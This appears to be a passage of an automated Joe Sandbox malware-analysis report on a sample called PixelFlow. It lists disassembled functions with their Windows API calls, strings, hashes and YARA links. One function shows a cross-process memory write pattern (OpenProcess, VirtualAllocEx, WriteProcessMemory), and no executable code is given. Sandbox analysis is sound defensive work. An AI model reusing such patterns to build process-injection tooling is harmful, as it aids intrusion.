Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3a6d4bc5d79f209feba0944c34f6065a8de3978223e2d9ed0ea1131bfd6fa9da
Instruction ID: 975870210916078390020c833dc4ceb09263b8c238800f590037cc840c49eb16
Opcode Fuzzy Hash: 3a6d4bc5d79f209feba0944c34f6065a8de3978223e2d9ed0ea1131bfd6fa9da
Instruction Fuzzy Hash: AAF0AF71200204AFEB110FA5EC88EAB3BAEEF49755F00012AF904D7650DA609944DB60

Function 0065CB5F Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0065CB73
GetWindowTextW.USER32(00000000,?,00000100), ref: 0065CB8A
MessageBeep.USER32(00000000), ref: 0065CBA2
KillTimer.USER32(?,0000040A), ref: 0065CBBE
EndDialog.USER32(?,00000001), ref: 0065CBD8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a29054ac37e1cfdb26b59545f021cf52ae7656c6f368525c7939fdd96fd5888f
Instruction ID: aca94b03298a03bc48579244081380a454accbdfc933d6392702bb4f8a69c311
Opcode Fuzzy Hash: a29054ac37e1cfdb26b59545f021cf52ae7656c6f368525c7939fdd96fd5888f
Instruction Fuzzy Hash: 2E016230544708AFFB215F60DD4EFA6777EFB40716F04065AE982615E0DBF169588E90

Function 0060178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0060179B
StrokeAndFillPath.GDI32(?,?,0063BAF9,00000000,?), ref: 006017B7
SelectObject.GDI32(?,00000000), ref: 006017CA
DeleteObject.GDI32 ref: 006017DD
StrokePath.GDI32(?), ref: 006017F8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e6503fc7d0e1ede4af921696a1d407016df4231728318ccb7707bb8e0a24ef81
Instruction ID: 20c6bcc2ae733638ea9627c6f86feb9671c5de47adc9dd8d6d788202d4720e74
Opcode Fuzzy Hash: e6503fc7d0e1ede4af921696a1d407016df4231728318ccb7707bb8e0a24ef81
Instruction Fuzzy Hash: 04F04F30051208EFEB255F25EC4CB693FBBAB01326F04A215F429895F0C7318995DF34

Function 0066C847 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0066C8E2
CoCreateInstance.OLE32(00693D3C,00000000,00000001,00693BAC,?), ref: 0066C8FA

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

CoUninitialize.OLE32 ref: 0066CB67

Strings

.lnk, xrefs: 0066C876, 0066C89E, 0066C8A8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: ce9a6341b5021dc5fc1a21d9f5a2aeb1ff5dfa572a9e5ae0389b12476dc93449
Instruction ID: df4557aa0769322ce97a192d6251dbfafd5892dc28c65c49be5d41e6d183e066
Opcode Fuzzy Hash: ce9a6341b5021dc5fc1a21d9f5a2aeb1ff5dfa572a9e5ae0389b12476dc93449
Instruction Fuzzy Hash: CCA16CB1104201AFD354EF64D881EAFB7EEEF85354F00491CF2559B292EB70EA49CB96

Function 0060E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00620F16: std::exception::exception.LIBCMT ref: 00620F4C
Part of subcall function 00620F16: __CxxThrowException@8.LIBCMT ref: 00620F61

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 00611680: _memmove.LIBCMT ref: 006116DB

__swprintf.LIBCMT ref: 0060E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0060E431

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 5339e2c57e261a4dae133df6cc02caec4779b4b6284d8712c559dfd93489b36a
Instruction ID: 6f538d38af6a7a9616b7d414abae47b5146970c529fd47fb76547db0a2e689f0
Opcode Fuzzy Hash: 5339e2c57e261a4dae133df6cc02caec4779b4b6284d8712c559dfd93489b36a
Instruction Fuzzy Hash: C991B1711146119FC758EF24D885CAFB7A6EF96300F044D1DF5829B2A2EB31EE84CB96

Function 0062516D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006251FD

Part of subcall function 00630250: __87except.LIBCMT ref: 0063028B

Strings

pow, xrefs: 006251D5, 006251F2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 35002150af389acef323f726ad96b3452d8031dcb46de126f16acd63b66cc839
Instruction ID: 9580ae10bbe9eec72976155d261da30eb3761001e6213086a765d07c61c9c976
Opcode Fuzzy Hash: 35002150af389acef323f726ad96b3452d8031dcb46de126f16acd63b66cc839
Instruction Fuzzy Hash: DA518C6090DE02D7FB21BB14E9643BE37979B40750F208919E086823E5EE358ED99EC6

Function 0062057F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 006205BB
#, xrefs: 006205C4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 56e8902078311641880adb139eb2a5dff6cf9fce295e0996c12f623ff8acca39
Instruction ID: 569e567f40774126b8c0b92740c5f8fedbbf586d2ce396911958a5ecde707329
Opcode Fuzzy Hash: 56e8902078311641880adb139eb2a5dff6cf9fce295e0996c12f623ff8acca39
Instruction Fuzzy Hash: 335151700002668FEF11DF28D4406FA7BA6EF56310F98405AFC819B3A1DB30DD9ACB61

Function 0060E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0060E937
_memmove.LIBCMT ref: 0060E9D0
_free.LIBCMT ref: 0060E9F6
_memmove.LIBCMT ref: 0060EAA9

Strings

#Va, xrefs: 0060E9E2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove$_free
String ID: #Va
API String ID: 2620147621-320768695
Opcode ID: 84d7fe3d38e1939334c97aab08ee6a07966bbedf3cb3abfcb42ad4a4bbf08c52
Instruction ID: c928654d179d8d24ed1f0d25c34dc3ab06fbf1b8a0bbbddd971baff8873dd066
Opcode Fuzzy Hash: 84d7fe3d38e1939334c97aab08ee6a07966bbedf3cb3abfcb42ad4a4bbf08c52
Instruction Fuzzy Hash: A0515C716047518FDB28CF28C58176BBBE6FF89314F48492DE98A873A1E731D801CB52

Function 0061CF08 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0061CFBE
_memmove.LIBCMT ref: 0061D05A
_memset.LIBCMT ref: 0061D07E

Strings

ERCP, xrefs: 0061CF29

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 18f84ce56d6cf8143b0a901b2e6f50d18f1b590f2c894788e54b780fda3a2bc4
Instruction ID: c4aed4a54f151e6d365e626743f8f728480a4868d02a6b3fea76492ed2cbaece
Opcode Fuzzy Hash: 18f84ce56d6cf8143b0a901b2e6f50d18f1b590f2c894788e54b780fda3a2bc4
Instruction Fuzzy Hash: DD5190719007059FDB24CF65C9817EABBE6EF08311F28456EE94ACB241E770EA86CB41

Function 0065A190 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00661B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00659C31,?,?,00000034,00000800,?,00000034), ref: 00661B51

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0065A1DA

Part of subcall function 00661AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00659C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00661B1C

Part of subcall function 00661A49: GetWindowThreadProcessId.USER32(?,?), ref: 00661A74
Part of subcall function 00661A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00659BF5,00000034,?,?,00001004,00000000,00000000), ref: 00661A84
Part of subcall function 00661A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00659BF5,00000034,?,?,00001004,00000000,00000000), ref: 00661A9A

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0065A247
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0065A294

Strings

@, xrefs: 0065A2AC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 6a46821ccb4e224f69328a6b70a84abdfd4408371d065b5004b06ff2bdad25b2
Instruction ID: dcd3980ceb7f83ea267551c84008eeb54a4c77d02db0d41a301a10fa920e4250
Opcode Fuzzy Hash: 6a46821ccb4e224f69328a6b70a84abdfd4408371d065b5004b06ff2bdad25b2
Instruction Fuzzy Hash: 45414F72901118BFDB10DFA4CD42AEEBBB9EF4A300F044199F955B7181DA716E49CB51

Function 006877C6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0068784E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00687862
SendMessageW.USER32(?,00001002,00000000,?), ref: 00687886

Strings

SysMonthCal32, xrefs: 00687819

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 8cfa297279fc1b55530da7f2bbeb26db7bb9be1d74cc2d08063c3bdce1e29898
Instruction ID: f68257fd29e76dbcc19dd3d8a42d9f8bb89a63785cad1f6f6e842944ea7e0b4b
Opcode Fuzzy Hash: 8cfa297279fc1b55530da7f2bbeb26db7bb9be1d74cc2d08063c3bdce1e29898
Instruction Fuzzy Hash: 7A21BF32644218BBDF119F94CC46FEA3B6AEF88714F110214FE596B190D6B1EC90DBA0

Function 0068709D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00687128
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00687138
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0068715D

Strings

Listbox, xrefs: 006870F5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b9eaab91c7c0f2190644f9c4640dfc6682b6e803fbad6b03a13fae6224b9acf4
Instruction ID: f6347c20d971a9ac59b0df7956ba80f2fb7b5adf372ba30a9cc7cb78de65aa21
Opcode Fuzzy Hash: b9eaab91c7c0f2190644f9c4640dfc6682b6e803fbad6b03a13fae6224b9acf4
Instruction Fuzzy Hash: BD21C272614118BFEF119F54DC45EFB37ABEF89760F118224FA449B290C671EC5187A0

Function 00687AFB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00687B5F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00687B74
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00687B81

Strings

msctls_trackbar32, xrefs: 00687B36

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: b0c1273b2974090357bbe78743962a7801592605641f2f2285bb0ee2efcf25dc
Instruction ID: f5a31d8c06618b88b5f727ec7d3fc6a4d8733be3829f83d6dd103449c38f0816
Opcode Fuzzy Hash: b0c1273b2974090357bbe78743962a7801592605641f2f2285bb0ee2efcf25dc
Instruction Fuzzy Hash: 6811C472244208BBDF246F60CC05FEB37ABEF99758F110618FB5597190D271D851DB10

Function 0063B421 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0063B474: _memset.LIBCMT ref: 0063B481

Part of subcall function 00620A9F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0063B450,?,?,?,0060100A), ref: 00620AA4

IsDebuggerPresent.KERNEL32(?,?,?,0060100A), ref: 0063B454
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0060100A), ref: 0063B463

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0063B45E
=j, xrefs: 0063B444

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=j
API String ID: 3158253471-1507138387
Opcode ID: d1770a010d20827b1497b54aa368bb672da7610ab2d194c0cd9450b52cfcd7a9
Instruction ID: 03ef23888dfddac07a57cbc38a2a5efc4d440173bdfc7863be7098efc04ef885
Opcode Fuzzy Hash: d1770a010d20827b1497b54aa368bb672da7610ab2d194c0cd9450b52cfcd7a9
Instruction Fuzzy Hash: ACE06D70200711CFE360AF39E405742BAE6AF05304F01991DE496C2752D7B5D904CB95

Function 0067C4A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006401AA,?), ref: 0067C4AF
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067C4C1

Strings

kernel32.dll, xrefs: 0067C4AA
GetSystemWow64DirectoryW, xrefs: 0067C4BB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: dfe1b31d8c0741be1af23bfaa593ed8c98894a664022d1b6897137a9d4d86805
Instruction ID: 325c4dc049fdecc4f35fc7c32a7031e83b6b9d8f52955b787526da9cc3868551
Opcode Fuzzy Hash: dfe1b31d8c0741be1af23bfaa593ed8c98894a664022d1b6897137a9d4d86805
Instruction Fuzzy Hash: AFE0C2755007028FF7304F69CC18A9276DABF14765B10D82EE89EC2B24D770C884C710

Function 00614B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00614B44,?,006149D4,?,?,006127AF,?,00000001), ref: 00614B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00614B97

Strings

kernel32.dll, xrefs: 00614B80
Wow64DisableWow64FsRedirection, xrefs: 00614B91

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: eaf42480a527de1bae426ab8a51abd562f4ad850ca056529f3a95db162dfbbc3
Instruction ID: 1bc05f6ac450b0d41ddf91f1fa71632a4dbe558e2b88ab5200a125763324796f
Opcode Fuzzy Hash: eaf42480a527de1bae426ab8a51abd562f4ad850ca056529f3a95db162dfbbc3
Instruction Fuzzy Hash: 34D012B05107128FE7205F71D81878676DAAF04751F25D82AD495D2660DA74D4C0C610

Function 00614BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00614AF7,?), ref: 00614BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00614BCA

Strings

kernel32.dll, xrefs: 00614BB3
Wow64RevertWow64FsRedirection, xrefs: 00614BC4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: c77b80c7c10e035629604764e1d70f31d511304dc8b9469328e2b5698ad7f47f
Instruction ID: aee2b58d8d9f9389c17d157fe73507769e6adaef4b8a2ad4254890e1f16dce81
Opcode Fuzzy Hash: c77b80c7c10e035629604764e1d70f31d511304dc8b9469328e2b5698ad7f47f
Instruction Fuzzy Hash: 36D0C7704003228FE7208F70E808B8672EBAF00350B16AC2AE496C2A60EA70C8D0CA10

Function 0068120F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,0068145E), ref: 0068121D
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0068122F

Strings

RegDeleteKeyExW, xrefs: 00681229
advapi32.dll, xrefs: 00681218

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

